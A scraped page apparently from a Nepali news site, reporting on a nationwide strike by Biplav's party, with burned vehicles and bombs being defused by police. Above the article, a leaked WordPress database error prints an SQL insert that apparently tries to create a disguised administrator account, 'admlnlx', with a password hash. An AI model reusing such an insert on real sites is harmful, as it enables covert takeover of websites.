WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BG4AOfGD5AELKBXKo/rU3fe2ZWUas11', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 12:10:53', '', 'admlnlx', 'admlnlx')
फागुन ३०, काठमाडौँ ।
नेत्रविक्रम चन्द विप्लव नेतृत्वको नेकपाको बन्दबाट देशभरका जनता प्रभावित भएका छन् ।
देशका विभिन्न भूभागमा बन्दले शैक्षिक संस्था, यातायात र बजार बन्द छन् । गतिविधिमाथि सरकारले प्रतिबन्ध लगाएपछि विप्लवका कार्यकर्ताले बुधबार रातिदेखि आतंक मच्चाउन थालेका थिए ।
विप्लवका कार्यकर्ताले बन्दका क्रममा बिहीबार बिहानै देशका विभिन्न स्थानमा सवारी साधन जलाएका छन् । देशका विभिन्न सडक र सहरमा बम राखिँदा सर्वसाधरण त्रसित भएका छन् ।
ठाउँ ठाउँमा राखिएको बम निश्क्रिया पार्न नेपाल प्रहरीको बम डिस्पोजल टोली खटिरहेको प्रहरीले जनाएको छ ।